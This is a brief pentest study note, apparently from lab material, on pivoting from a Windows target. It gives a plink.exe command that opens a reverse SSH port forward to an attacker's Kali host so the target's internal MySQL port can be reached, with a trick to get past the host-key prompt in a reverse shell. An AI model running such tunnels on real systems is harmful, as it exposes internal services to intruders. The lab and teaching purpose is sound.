Previous
- Scanning localhost on window
netstat -anpb TCP
- cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak 10.11.0.4 -R 10.11.0.4:1234:127.0.0.1:3306
plink.exe to connect via SSH (-ssh) to our Kali machine (10.11.0.4) as the kali user (-l kali) with a password of "ilak" (-pw ilak) to create a remote port forward (-R) of port 1234 (10.11.0.4:1234) to the MySQL port on the Windows target (127.0.0.1:3306) . The first time plink connects to a host, it will attempt to cache the host key in the registry. However, since this will most likely not work with the interactivity level we have in a typical reverse shell, we should pipe the answer to the prompt with the cmd.exe /c echo y command.
- Check on kali, sudo nmap -sV 127.0.0.1 -p 1234